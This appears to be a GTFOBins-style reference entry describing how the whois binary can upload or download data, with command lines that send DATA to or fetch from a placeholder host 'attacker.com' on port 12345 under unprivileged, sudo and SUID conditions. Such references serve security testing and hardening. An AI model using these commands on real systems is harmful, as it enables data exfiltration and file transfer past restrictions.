whois
Upload
This executable can upload local data.
- This function can be performed by any unprivileged user.
whois -h attacker.com -p 12345 DATAThis function is performed by the privileged user if executed viasudobecause the acquired privileges are not dropped.whois -h attacker.com -p 12345 DATAThis function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.whois -h attacker.com -p 12345 DATA
Download
This executable can download remote data.
- This function can be performed by any unprivileged user.
whois -h attacker.com -p 12345 xThis function is performed by the privileged user if executed viasudobecause the acquired privileges are not dropped.whois -h attacker.com -p 12345 xThis function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.whois -h attacker.com -p 12345 x